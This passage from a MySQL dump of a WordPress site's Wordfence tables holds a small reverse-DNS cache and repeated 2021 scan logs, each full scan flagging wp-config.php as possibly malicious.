  KEY `ignoreP` (`ignoreP`),
  KEY `ignoreC` (`ignoreC`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wfpendingissues`
--

LOCK TABLES `wp_wfpendingissues` WRITE;
/*!40000 ALTER TABLE `wp_wfpendingissues` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_wfpendingissues` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wfreversecache`
--

DROP TABLE IF EXISTS `wp_wfreversecache`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wfreversecache` (
  `IP` binary(16) NOT NULL DEFAULT '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',
  `host` varchar(255) NOT NULL,
  `lastUpdate` int(10) unsigned NOT NULL,
  PRIMARY KEY (`IP`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wfreversecache`
--

LOCK TABLES `wp_wfreversecache` WRITE;
/*!40000 ALTER TABLE `wp_wfreversecache` DISABLE KEYS */;
INSERT INTO `wp_wfreversecache` VALUES ('\0\0\0\0\0\0\0\0\0\0��B�BX','crawl-66-249-66-88.googlebot.com',1629721240),('\0\0\0\0\0\0\0\0\0\0��B�BY','crawl-66-249-66-89.googlebot.com',1629723468),('\0\0\0\0\0\0\0\0\0\0��B�BZ','crawl-66-249-66-90.googlebot.com',1629724737),('\0\0\0\0\0\0\0\0\0\0��gF�M','103.70.171.77',1629755546),('\0\0\0\0\0\0\0\0\0\0��h�FX','88.70.199.104.bc.googleusercontent.com',1629677423);
/*!40000 ALTER TABLE `wp_wfreversecache` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wfsnipcache`
--

DROP TABLE IF EXISTS `wp_wfsnipcache`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wfsnipcache` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `IP` varchar(45) NOT NULL DEFAULT '',
  `expiration` timestamp NOT NULL DEFAULT current_timestamp(),
  `body` varchar(255) NOT NULL DEFAULT '',
  `count` int(10) unsigned NOT NULL DEFAULT 0,
  `type` int(10) unsigned NOT NULL DEFAULT 0,
  PRIMARY KEY (`id`),
  KEY `expiration` (`expiration`),
  KEY `IP` (`IP`),
  KEY `type` (`type`)
) ENGINE=InnoDB AUTO_INCREMENT=46 DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wfsnipcache`
--

LOCK TABLES `wp_wfsnipcache` WRITE;
/*!40000 ALTER TABLE `wp_wfsnipcache` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_wfsnipcache` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wfstatus`
--

DROP TABLE IF EXISTS `wp_wfstatus`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wfstatus` (
  `id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `ctime` double(17,6) unsigned NOT NULL,
  `level` tinyint(3) unsigned NOT NULL,
  `type` char(5) NOT NULL,
  `msg` varchar(1000) NOT NULL,
  PRIMARY KEY (`id`),
  KEY `k1` (`ctime`),
  KEY `k2` (`type`)
) ENGINE=InnoDB AUTO_INCREMENT=3379 DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wfstatus`
--

LOCK TABLES `wp_wfstatus` WRITE;
/*!40000 ALTER TABLE `wp_wfstatus` DISABLE KEYS */;
INSERT INTO `wp_wfstatus` VALUES (1836,1626662249.858135,2,'info','Analyzed 3563 files containing 77.93 MB of data.'),(1844,1626662252.796878,2,'info','Starting scan of file contents'),(1845,1626662253.904626,2,'info','Scanned contents of 22 additional files at 20.27 per second'),(1846,1626662255.283466,2,'info','Scanned contents of 24 additional files at 9.74 per second'),(1847,1626662255.458970,2,'info','Scanned contents of 26 additional files at 9.85 per second'),(1848,1626662255.477601,2,'info','Asking Wordfence to check URLs against malware list.'),(1849,1626662255.517255,2,'info','Checking 105 host keys against Wordfence scanning servers.'),(1850,1626662256.193698,2,'info','Done host key check.'),(1851,1626662258.096174,2,'info','Done file contents scan'),(1852,1626662258.124151,2,'info','Adding issue: File appears to be malicious or unsafe: wp-config.php'),(1858,1626662258.724065,2,'info','Examining URLs found in posts we scanned for dangerous websites'),(1859,1626662258.749582,2,'info','Checking 106 host keys against Wordfence scanning servers.'),(1860,1626662259.362484,2,'info','Done host key check.'),(1861,1626662259.372858,2,'info','Done examining URLs'),(1866,1626662260.222661,2,'info','Starting password strength check on 1 user.'),(1873,1626662265.082052,2,'info','Examining URLs found in the options we scanned for dangerous websites'),(1874,1626662265.092335,2,'info','Done examining URLs'),(1876,1626662265.422026,1,'info','-------------------'),(1877,1626662265.433314,2,'info','Wordfence used 14.57 MB of memory for scan. Server peak memory usage was: 50.57 MB'),(1878,1626662265.443937,1,'info','Scan Complete. Scanned 3563 files, 5 plugins, 4 themes, 31 posts, 0 comments and 105 URLs in 4 minutes 52 seconds.'),(1881,1626690006.884606,1,'info','Initiating quick scan'),(1886,1626690007.100721,1,'info','-------------------'),(1887,1626690007.121523,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 36 MB'),(1888,1626690007.131895,1,'info','Quick Scan Complete. Scanned in 1 second.'),(1891,1626776807.155434,1,'info','Initiating quick scan'),(1896,1626776807.333520,1,'info','-------------------'),(1897,1626776807.354536,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 32 MB'),(1898,1626776807.365024,1,'info','Quick Scan Complete. Scanned in less than 1 second.'),(1901,1626862628.773043,1,'info','Initiating quick scan'),(1906,1626862629.908406,1,'info','-------------------'),(1907,1626862629.925758,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 36 MB'),(1908,1626862629.938066,1,'info','Quick Scan Complete. Scanned in 1 second.'),(1910,1626921796.782087,1,'info','Scheduled Wordfence scan starting at Thursday 22nd of July 2021 02:43:16 AM'),(1912,1626921798.015128,1,'info','Contacting Wordfence to initiate scan'),(1919,1626921805.591402,2,'info','Total disk space: 3.58 TB -- Free disk space: 3.31 TB'),(1920,1626921805.603401,2,'info','The disk has 3466373.17 MB available'),(1928,1626921805.852777,2,'info','Getting plugin list from WordPress'),(1929,1626921805.884497,2,'info','Found 4 plugins'),(1930,1626921805.898947,2,'info','Getting theme list from WordPress'),(1931,1626921805.956501,2,'info','Found 4 themes'),(1943,1626921809.647004,2,'info','500 files indexed'),(1944,1626921809.814845,2,'info','1000 files indexed'),(1945,1626921809.981014,2,'info','1500 files indexed'),(1946,1626921810.089761,2,'info','2000 files indexed'),(1947,1626921810.245245,2,'info','2500 files indexed'),(1948,1626921810.367195,2,'info','3000 files indexed'),(1949,1626921810.551321,2,'info','3500 files indexed'),(1950,1626921810.590809,2,'info','3563 files indexed'),(1951,1626921818.067556,2,'info','Analyzed 100 files containing 8.31 MB of data so far'),(1952,1626921822.092302,2,'info','Analyzed 200 files containing 9.9 MB of data so far'),(1953,1626921826.363659,2,'info','Analyzed 300 files containing 11.22 MB of data so far'),(1954,1626921831.401882,2,'info','Analyzed 400 files containing 13.91 MB of data so far'),(1955,1626921837.601419,2,'info','Analyzed 500 files containing 14.77 MB of data so far'),(1956,1626921842.287100,2,'info','Analyzed 600 files containing 15.63 MB of data so far'),(1957,1626921848.087503,2,'info','Analyzed 700 files containing 16.77 MB of data so far'),(1958,1626921853.758939,2,'info','Analyzed 800 files containing 17.79 MB of data so far'),(1959,1626921858.794066,2,'info','Analyzed 900 files containing 19.54 MB of data so far'),(1960,1626921869.254017,2,'info','Analyzed 1000 files containing 25.03 MB of data so far'),(1961,1626921873.655854,2,'info','Analyzed 1100 files containing 26.51 MB of data so far'),(1962,1626921878.044802,2,'info','Analyzed 1200 files containing 27.73 MB of data so far'),(1963,1626921882.810229,2,'info','Analyzed 1300 files containing 28.41 MB of data so far'),(1964,1626921888.613415,2,'info','Analyzed 1400 files containing 29.35 MB of data so far'),(1965,1626921892.496813,2,'info','Analyzed 1500 files containing 29.38 MB of data so far'),(1966,1626921896.940505,2,'info','Analyzed 1600 files containing 29.42 MB of data so far'),(1967,1626921902.708455,2,'info','Analyzed 1700 files containing 30.65 MB of data so far'),(1968,1626921908.698884,2,'info','Analyzed 1800 files containing 33.14 MB of data so far'),(1969,1626921913.787734,2,'info','Analyzed 1900 files containing 34.11 MB of data so far'),(1970,1626921919.603542,2,'info','Analyzed 2000 files containing 35.33 MB of data so far'),(1971,1626921923.885151,2,'info','Analyzed 2100 files containing 37.8 MB of data so far'),(1972,1626921928.319109,2,'info','Analyzed 2200 files containing 40.26 MB of data so far'),(1973,1626921931.767363,2,'info','Analyzed 2300 files containing 41.31 MB of data so far'),(1974,1626921938.408008,2,'info','Analyzed 2400 files containing 44.39 MB of data so far'),(1975,1626921943.223306,2,'info','Analyzed 2500 files containing 45.01 MB of data so far'),(1976,1626921950.559049,2,'info','Analyzed 2600 files containing 46.9 MB of data so far'),(1977,1626921956.198908,2,'info','Analyzed 2700 files containing 49.77 MB of data so far'),(1978,1626921961.463016,2,'info','Analyzed 2800 files containing 51.52 MB of data so far'),(1979,1626921966.256881,2,'info','Analyzed 2900 files containing 53.27 MB of data so far'),(1980,1626921972.986970,2,'info','Analyzed 3000 files containing 65.77 MB of data so far'),(1981,1626921977.869283,2,'info','Analyzed 3100 files containing 67.35 MB of data so far'),(1982,1626921982.084790,2,'info','Analyzed 3200 files containing 69.74 MB of data so far'),(1983,1626921987.262389,2,'info','Analyzed 3300 files containing 72.57 MB of data so far'),(1984,1626921992.003585,2,'info','Analyzed 3400 files containing 75.65 MB of data so far'),(1985,1626921996.807270,2,'info','Analyzed 3500 files containing 76.82 MB of data so far'),(1986,1626921999.271248,2,'info','Analyzed 3563 files containing 77.94 MB of data.'),(1994,1626922001.245742,2,'info','Starting scan of file contents'),(1995,1626922003.273071,2,'info','Scanned contents of 20 additional files at 19.97 per second'),(1996,1626922003.690846,2,'info','Scanned contents of 26 additional files at 18.32 per second'),(1997,1626922003.703217,2,'info','Asking Wordfence to check URLs against malware list.'),(1998,1626922003.720472,2,'info','Checking 105 host keys against Wordfence scanning servers.'),(1999,1626922004.376549,2,'info','Done host key check.'),(2000,1626922005.273514,2,'info','Done file contents scan'),(2001,1626922005.281748,2,'info','Adding issue: File appears to be malicious or unsafe: wp-config.php'),(2007,1626922006.125281,2,'info','Examining URLs found in posts we scanned for dangerous websites'),(2008,1626922006.144613,2,'info','Checking 106 host keys against Wordfence scanning servers.'),(2009,1626922006.812568,2,'info','Done host key check.'),(2010,1626922007.188089,2,'info','Done examining URLs'),(2015,1626922008.638423,2,'info','Starting password strength check on 1 user.'),(2022,1626922012.664281,2,'info','Examining URLs found in the options we scanned for dangerous websites'),(2023,1626922012.672534,2,'info','Done examining URLs'),(2025,1626922012.960344,1,'info','-------------------'),(2026,1626922012.974465,2,'info','Wordfence used 12.57 MB of memory for scan. Server peak memory usage was: 48.58 MB'),(2027,1626922013.000612,1,'info','Scan Complete. Scanned 3563 files, 5 plugins, 4 themes, 31 posts, 0 comments and 105 URLs in 3 minutes 34 seconds.'),(2029,1627312439.917784,1,'info','Scheduled Wordfence scan starting at Monday 26th of July 2021 03:13:59 PM'),(2031,1627312458.761339,1,'info','Contacting Wordfence to initiate scan'),(2035,1627439515.298182,1,'info','Scheduled Wordfence scan starting at Wednesday 28th of July 2021 02:31:55 AM'),(2037,1627439516.946766,1,'info','Contacting Wordfence to initiate scan'),(2044,1627439527.333914,2,'info','Total disk space: 3.58 TB -- Free disk space: 3.31 TB'),(2045,1627439527.353983,2,'info','The disk has 3467031.64 MB available'),(2053,1627439527.939315,2,'info','Getting plugin list from WordPress'),(2054,1627439527.984817,2,'info','Found 4 plugins'),(2055,1627439528.006635,2,'info','Getting theme list from WordPress'),(2056,1627439528.119293,2,'info','Found 4 themes'),(2068,1627439531.439520,2,'info','500 files indexed'),(2069,1627439531.632012,2,'info','1000 files indexed'),(2070,1627439531.895247,2,'info','1500 files indexed'),(2071,1627439532.100350,2,'info','2000 files indexed'),(2072,1627439532.303302,2,'info','2500 files indexed'),(2073,1627439532.486954,2,'info','3000 files indexed'),(2074,1627439532.591715,2,'info','3500 files indexed'),(2075,1627439532.653610,2,'info','3563 files indexed'),(2076,1627439540.527597,2,'info','Analyzed 100 files containing 7.46 MB of data so far'),(2077,1627439543.788261,2,'info','Analyzed 200 files containing 9.04 MB of data so far'),(2078,1627439558.522877,2,'info','Analyzed 300 files containing 10.36 MB of data so far'),(2079,1627439561.768213,2,'info','Analyzed 400 files containing 13.06 MB of data so far'),(2080,1627439566.581375,2,'info','Analyzed 500 files containing 13.91 MB of data so far'),(2081,1627439572.382436,2,'info','Analyzed 600 files containing 14.77 MB of data so far'),(2082,1627439578.238660,2,'info','Analyzed 700 files containing 15.91 MB of data so far'),(2083,1627439583.984738,2,'info','Analyzed 800 files containing 16.94 MB of data so far'),(2084,1627439611.077819,2,'info','Analyzed 900 files containing 18.69 MB of data so far'),(2085,1627439621.967847,2,'info','Analyzed 1000 files containing 24.17 MB of data so far'),(2086,1627439630.157505,2,'info','Analyzed 1100 files containing 25.65 MB of data so far'),(2087,1627439638.533443,2,'info','Analyzed 1200 files containing 26.87 MB of data so far'),(2088,1627439652.461080,2,'info','Analyzed 1300 files containing 27.55 MB of data so far'),(2089,1627439659.798123,2,'info','Analyzed 1400 files containing 28.49 MB of data so far'),(2090,1627439669.521812,2,'info','Analyzed 1500 files containing 28.53 MB of data so far'),(2091,1627439691.500781,2,'info','Analyzed 1600 files containing 28.56 MB of data so far'),(2092,1627439700.803325,2,'info','Analyzed 1700 files containing 29.8 MB of data so far'),(2093,1627439711.951560,2,'info','Analyzed 1800 files containing 32.28 MB of data so far'),(2094,1627439720.176467,2,'info','Analyzed 1900 files containing 33.26 MB of data so far'),(2095,1627439730.742708,2,'info','Analyzed 2000 files containing 34.47 MB of data so far'),(2096,1627439748.800414,2,'info','Analyzed 2100 files containing 36.95 MB of data so far'),(2097,1627439758.698085,2,'info','Analyzed 2200 files containing 39.41 MB of data so far'),(2098,1627439768.028286,2,'info','Analyzed 2300 files containing 40.45 MB of data so far'),(2099,1627439786.941725,2,'info','Analyzed 2400 files containing 43.54 MB of data so far'),(2100,1627439797.222812,2,'info','Analyzed 2500 files containing 44.16 MB of data so far'),(2101,1627439806.622296,2,'info','Analyzed 2600 files containing 46.05 MB of data so far'),(2102,1627439819.429638,2,'info','Analyzed 2700 files containing 48.92 MB of data so far'),(2103,1627439827.520237,2,'info','Analyzed 2800 files containing 50.67 MB of data so far'),(2104,1627439837.716182,2,'info','Analyzed 2900 files containing 52.42 MB of data so far'),(2105,1627439847.565395,2,'info','Analyzed 3000 files containing 64.92 MB of data so far'),(2106,1627439857.405904,2,'info','Analyzed 3100 files containing 66.5 MB of data so far'),(2107,1627439867.445693,2,'info','Analyzed 3200 files containing 68.89 MB of data so far'),(2108,1627439876.742468,2,'info','Analyzed 3300 files containing 71.72 MB of data so far'),(2109,1627439890.506429,2,'info','Analyzed 3400 files containing 74.8 MB of data so far'),(2110,1627439903.183245,2,'info','Analyzed 3500 files containing 75.97 MB of data so far'),(2111,1627439920.325727,2,'info','Analyzed 3563 files containing 77.09 MB of data.'),(2119,1627439923.446375,2,'info','Starting scan of file contents'),(2120,1627439924.535845,2,'info','Scanned contents of 14 additional files at 13.35 per second'),(2121,1627439925.529404,2,'info','Scanned contents of 26 additional files at 12.73 per second'),(2122,1627439925.548573,2,'info','Asking Wordfence to check URLs against malware list.'),(2123,1627439925.570626,2,'info','Checking 105 host keys against Wordfence scanning servers.'),(2124,1627439926.195067,2,'info','Done host key check.'),(2125,1627439927.152532,2,'info','Done file contents scan'),(2126,1627439927.177575,2,'info','Adding issue: File appears to be malicious or unsafe: wp-config.php'),(2132,1627439928.387343,2,'info','Examining URLs found in posts we scanned for dangerous websites'),(2133,1627439928.408274,2,'info','Checking 106 host keys against Wordfence scanning servers.'),(2134,1627439929.064808,2,'info','Done host key check.'),(2135,1627439929.073573,2,'info','Done examining URLs'),(2140,1627439930.376239,2,'info','Starting password strength check on 1 user.'),(2147,1627439937.009647,2,'info','Examining URLs found in the options we scanned for dangerous websites'),(2148,1627439937.034437,2,'info','Done examining URLs'),(2150,1627439937.525034,1,'info','-------------------'),(2151,1627439937.554647,2,'info','Wordfence used 10 MB of memory for scan. Server peak memory usage was: 46 MB'),(2152,1627439937.592020,1,'info','Scan Complete. Scanned 3563 files, 5 plugins, 4 themes, 31 posts, 0 comments and 105 URLs in 7 minutes.'),(2155,1627467417.098254,1,'info','Initiating quick scan'),(2160,1627467417.388598,1,'info','-------------------'),(2161,1627467417.429524,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 36 MB'),(2162,1627467417.439952,1,'info','Quick Scan Complete. Scanned in less than 1 second.'),(2165,1627553894.795546,1,'info','Initiating quick scan'),(2170,1627553895.029922,1,'info','-------------------'),(2171,1627553895.052471,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 36 MB'),(2172,1627553895.063914,1,'info','Quick Scan Complete. Scanned in 1 second.'),(2175,1627640252.897523,1,'info','Initiating quick scan'),(2180,1627640253.167220,1,'info','-------------------'),(2181,1627640253.171905,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 36 MB'),(2182,1627640253.182008,1,'info','Quick Scan Complete. Scanned in 1 second.'),(2184,1627698608.041960,1,'info','Scheduled Wordfence scan starting at Saturday 31st of July 2021 02:30:08 AM'),(2186,1627698610.262855,1,'info','Contacting Wordfence to initiate scan'),(2193,1627698617.957814,2,'info','Total disk space: 3.58 TB -- Free disk space: 3.31 TB'),(2194,1627698617.978624,2,'info','The disk has 3465803.79 MB available'),(2202,1627698618.387426,2,'info','Getting plugin list from WordPress'),(2203,1627698618.424454,2,'info','Found 4 plugins'),(2204,1627698618.442004,2,'info','Getting theme list from WordPress'),(2205,1627698618.525009,2,'info','Found 4 themes'),(2217,1627698624.639782,2,'info','500 files indexed'),(2218,1627698625.021287,2,'info','1000 files indexed'),(2219,1627698625.294046,2,'info','1500 files indexed'),(2220,1627698625.515195,2,'info','2000 files indexed'),(2221,1627698625.794573,2,'info','2500 files indexed'),(2222,1627698625.989209,2,'info','3000 files indexed'),(2223,1627698626.260740,2,'info','3500 files indexed'),(2224,1627698626.331133,2,'info','3563 files indexed'),(2225,1627698641.165905,2,'info','Analyzed 100 files containing 7.46 MB of data so far'),(2226,1627698645.095205,2,'info','Analyzed 200 files containing 9.04 MB of data so far'),(2227,1627698654.662036,2,'info','Analyzed 300 files containing 10.36 MB of data so far'),(2228,1627698661.983622,2,'info','Analyzed 400 files containing 13.06 MB of data so far'),(2229,1627698666.332503,2,'info','Analyzed 500 files containing 13.91 MB of data so far'),(2230,1627698672.332900,2,'info','Analyzed 600 files containing 14.77 MB of data so far'),(2231,1627698676.267183,2,'info','Analyzed 700 files containing 15.91 MB of data so far'),(2232,1627698681.675022,2,'info','Analyzed 800 files containing 16.94 MB of data so far'),(2233,1627698687.451506,2,'info','Analyzed 900 files containing 18.69 MB of data so far'),(2234,1627698691.349459,2,'info','Analyzed 1000 files containing 24.17 MB of data so far'),(2235,1627698695.323668,2,'info','Analyzed 1100 files containing 25.65 MB of data so far'),(2236,1627698699.974601,2,'info','Analyzed 1200 files containing 26.87 MB of data so far'),(2237,1627698707.002681,2,'info','Analyzed 1300 files containing 27.55 MB of data so far'),(2238,1627698713.420458,2,'info','Analyzed 1400 files containing 28.49 MB of data so far'),(2239,1627698721.548280,2,'info','Analyzed 1500 files containing 28.53 MB of data so far'),(2240,1627698725.732060,2,'info','Analyzed 1600 files containing 28.56 MB of data so far'),(2241,1627698729.151241,2,'info','Analyzed 1700 files containing 29.8 MB of data so far'),(2242,1627698733.789549,2,'info','Analyzed 1800 files containing 32.28 MB of data so far'),(2243,1627698739.104361,2,'info','Analyzed 1900 files containing 33.26 MB of data so far'),(2244,1627698744.622245,2,'info','Analyzed 2000 files containing 34.47 MB of data so far'),(2245,1627698749.295751,2,'info','Analyzed 2100 files containing 36.95 MB of data so far'),(2246,1627698755.579026,2,'info','Analyzed 2200 files containing 39.41 MB of data so far'),(2247,1627698759.711142,2,'info','Analyzed 2300 files containing 40.45 MB of data so far'),(2248,1627698763.613916,2,'info','Analyzed 2400 files containing 43.54 MB of data so far'),(2249,1627698769.580539,2,'info','Analyzed 2500 files containing 44.16 MB of data so far'),(2250,1627698774.123817,2,'info','Analyzed 2600 files containing 46.05 MB of data so far'),(2251,1627698778.557058,2,'info','Analyzed 2700 files containing 48.92 MB of data so far'),(2252,1627698782.376650,2,'info','Analyzed 2800 files containing 50.67 MB of data so far'),(2253,1627698788.290065,2,'info','Analyzed 2900 files containing 52.42 MB of data so far'),(2254,1627698793.473036,2,'info','Analyzed 3000 files containing 64.92 MB of data so far'),(2255,1627698798.171234,2,'info','Analyzed 3100 files containing 66.5 MB of data so far'),(2256,1627698803.064389,2,'info','Analyzed 3200 files containing 68.89 MB of data so far'),(2257,1627698810.252996,2,'info','Analyzed 3300 files containing 71.72 MB of data so far'),(2258,1627698815.841626,2,'info','Analyzed 3400 files containing 74.8 MB of data so far'),(2259,1627698820.722218,2,'info','Analyzed 3500 files containing 75.97 MB of data so far'),(2260,1627698823.511689,2,'info','Analyzed 3563 files containing 77.09 MB of data.'),(2268,1627698825.458818,2,'info','Starting scan of file contents'),(2269,1627698826.485883,2,'info','Scanned contents of 17 additional files at 16.90 per second'),(2270,1627698827.074371,2,'info','Scanned contents of 26 additional files at 16.31 per second'),(2271,1627698827.084901,2,'info','Asking Wordfence to check URLs against malware list.'),(2272,1627698827.103200,2,'info','Checking 105 host keys against Wordfence scanning servers.'),(2273,1627698827.715859,2,'info','Done host key check.'),(2274,1627698828.788787,2,'info','Done file contents scan'),(2275,1627698828.812386,2,'info','Adding issue: File appears to be malicious or unsafe: wp-config.php'),(2281,1627698830.620392,2,'info','Examining URLs found in posts we scanned for dangerous websites'),(2282,1627698830.632957,2,'info','Checking 106 host keys against Wordfence scanning servers.'),(2283,1627698831.255452,2,'info','Done host key check.'),(2284,1627698831.279141,2,'info','Done examining URLs'),(2289,1627698833.565286,2,'info','Starting password strength check on 1 user.'),(2296,1627698837.350290,2,'info','Examining URLs found in the options we scanned for dangerous websites'),(2297,1627698837.361910,2,'info','Done examining URLs'),(2299,1627698837.724629,1,'info','-------------------'),(2300,1627698837.735333,2,'info','Wordfence used 34 MB of memory for scan. Server peak memory usage was: 70 MB'),(2301,1627698837.746496,1,'info','Scan Complete. Scanned 3563 files, 5 plugins, 4 themes, 31 posts, 0 comments and 105 URLs in 3 minutes 46 seconds.'),(2304,1627726810.231506,1,'info','Initiating quick scan'),(2309,1627726810.602024,1,'info','-------------------'),(2310,1627726810.643110,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 36 MB'),(2311,1627726810.656597,1,'info','Quick Scan Complete. Scanned in less than 1 second.'),(2314,1627813031.924370,1,'info','Initiating quick scan'),(2319,1627813032.248732,1,'info','-------------------'),(2320,1627813032.265011,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 24 MB'),(2321,1627813032.272015,1,'info','Quick Scan Complete. Scanned in 1 second.'),(2324,1627899485.016346,1,'info','Initiating quick scan'),(2329,1627899487.880726,1,'info','-------------------'),(2330,1627899488.153660,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 34 MB'),(2331,1627899488.286662,1,'info','Quick Scan Complete. Scanned in 3 seconds.'),(2333,1627957835.145100,1,'info','Scheduled Wordfence scan starting at Tuesday 3rd of August 2021 02:30:35 AM'),(2335,1627957836.904457,1,'info','Contacting Wordfence to initiate scan'),(2342,1627957845.096499,2,'info','Total disk space: 3.58 TB -- Free disk space: 3.3 TB'),(2343,1627957845.125022,2,'info','The disk has 3464135.82 MB available'),(2351,1627957845.773189,2,'info','Getting plugin list from WordPress'),(2352,1627957845.839916,2,'info','Found 4 plugins'),(2353,1627957845.879218,2,'info','Getting theme list from WordPress'),(2354,1627957845.995907,2,'info','Found 4 themes'),(2366,1627957849.325328,2,'info','500 files indexed'),(2367,1627957849.514727,2,'info','1000 files indexed'),(2368,1627957849.764764,2,'info','1500 files indexed'),(2369,1627957849.883085,2,'info','2000 files indexed'),(2370,1627957850.019267,2,'info','2500 files indexed'),(2371,1627957850.216425,2,'info','3000 files indexed'),(2372,1627957850.331352,2,'info','3500 files indexed'),(2373,1627957850.376209,2,'info','3563 files indexed'),(2374,1627957864.228516,2,'info','Analyzed 100 files containing 7.46 MB of data so far'),(2375,1627957874.423692,2,'info','Analyzed 200 files containing 9.04 MB of data so far'),(2376,1627957883.389447,2,'info','Analyzed 300 files containing 10.36 MB of data so far'),(2377,1627957893.989171,2,'info','Analyzed 400 files containing 13.06 MB of data so far'),(2378,1627957907.282477,2,'info','Analyzed 500 files containing 13.91 MB of data so far'),(2379,1627957916.515331,2,'info','Analyzed 600 files containing 14.77 MB of data so far'),(2380,1627957927.005130,2,'info','Analyzed 700 files containing 15.91 MB of data so far'),(2381,1627957935.734027,2,'info','Analyzed 800 files containing 16.94 MB of data so far'),(2382,1627957947.010685,2,'info','Analyzed 900 files containing 18.69 MB of data so far'),(2383,1627957955.757729,2,'info','Analyzed 1000 files containing 24.17 MB of data so far'),(2384,1627957965.249935,2,'info','Analyzed 1100 files containing 25.65 MB of data so far'),(2385,1627957979.864056,2,'info','Analyzed 1200 files containing 26.87 MB of data so far'),(2386,1627957993.580910,2,'info','Analyzed 1300 files containing 27.55 MB of data so far'),(2387,1627958003.272419,2,'info','Analyzed 1400 files containing 28.49 MB of data so far'),(2388,1627958015.463042,2,'info','Analyzed 1500 files containing 28.53 MB of data so far'),(2389,1627958024.505349,2,'info','Analyzed 1600 files containing 28.56 MB of data so far'),(2390,1627958036.313436,2,'info','Analyzed 1700 files containing 29.8 MB of data so far'),(2391,1627958049.323728,2,'info','Analyzed 1800 files containing 32.28 MB of data so far'),(2392,1627958057.431207,2,'info','Analyzed 1900 files containing 33.26 MB of data so far'),(2393,1627958070.942337,2,'info','Analyzed 2000 files containing 34.47 MB of data so far'),(2394,1627958082.316466,2,'info','Analyzed 2100 files containing 36.95 MB of data so far'),(2395,1627958097.613551,2,'info','Analyzed 2200 files containing 39.41 MB of data so far'),(2396,1627958108.618012,2,'info','Analyzed 2300 files containing 40.45 MB of data so far'),(2397,1627958117.748321,2,'info','Analyzed 2400 files containing 43.55 MB of data so far'),(2398,1627958125.794906,2,'info','Analyzed 2500 files containing 44.17 MB of data so far'),(2399,1627958136.257321,2,'info','Analyzed 2600 files containing 46.06 MB of data so far'),(2400,1627958144.860120,2,'info','Analyzed 2700 files containing 48.93 MB of data so far'),(2401,1627958155.438785,2,'info','Analyzed 2800 files containing 50.68 MB of data so far'),(2402,1627958172.483368,2,'info','Analyzed 2900 files containing 52.43 MB of data so far'),(2403,1627958180.270805,2,'info','Analyzed 3000 files containing 64.92 MB of data so far'),(2404,1627958189.032032,2,'info','Analyzed 3100 files containing 66.51 MB of data so far'),(2405,1627958200.210550,2,'info','Analyzed 3200 files containing 68.9 MB of data so far'),(2406,1627958207.345974,2,'info','Analyzed 3300 files containing 71.73 MB of data so far'),(2407,1627958217.282309,2,'info','Analyzed 3400 files containing 74.81 MB of data so far'),(2408,1627958225.874162,2,'info','Analyzed 3500 files containing 75.98 MB of data so far'),(2409,1627958233.184697,2,'info','Analyzed 3563 files containing 77.1 MB of data.'),(2417,1627958235.225161,2,'info','Starting scan of file contents'),(2418,1627958236.333616,2,'info','Scanned contents of 12 additional files at 11.52 per second'),(2419,1627958237.339378,2,'info','Scanned contents of 22 additional files at 10.74 per second'),(2420,1627958237.966743,2,'info','Scanned contents of 26 additional files at 9.72 per second'),(2421,1627958237.984485,2,'info','Asking Wordfence to check URLs against malware list.'),(2422,1627958238.024647,2,'info','Checking 105 host keys against Wordfence scanning servers.'),(2423,1627958238.652047,2,'info','Done host key check.'),(2424,1627958239.563840,2,'info','Done file contents scan'),(2425,1627958239.584135,2,'info','Adding issue: File appears to be malicious or unsafe: wp-config.php'),(2431,1627958240.326042,2,'info','Examining URLs found in posts we scanned for dangerous websites'),(2432,1627958240.337025,2,'info','Checking 106 host keys against Wordfence scanning servers.'),(2433,1627958240.945123,2,'info','Done host key check.'),(2434,1627958240.964456,2,'info','Done examining URLs'),(2439,1627958241.900553,2,'info','Starting password strength check on 1 user.'),(2446,1627958245.839857,2,'info','Examining URLs found in the options we scanned for dangerous websites'),(2447,1627958245.860729,2,'info','Done examining URLs'),(2449,1627958246.600929,1,'info','-------------------'),(2450,1627958246.662449,2,'info','Wordfence used 10 MB of memory for scan. Server peak memory usage was: 46 MB'),(2451,1627958246.683462,1,'info','Scan Complete. Scanned 3563 files, 5 plugins, 4 themes, 31 posts, 0 comments and 105 URLs in 6 minutes 48 seconds.'),(2454,1627985834.414628,1,'info','Initiating quick scan'),(2459,1627985837.842692,1,'info','-------------------'),(2460,1627985838.036478,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 36 MB'),(2461,1627985838.149829,1,'info','Quick Scan Complete. Scanned in 4 seconds.'),(2464,1628072330.191798,1,'info','Initiating quick 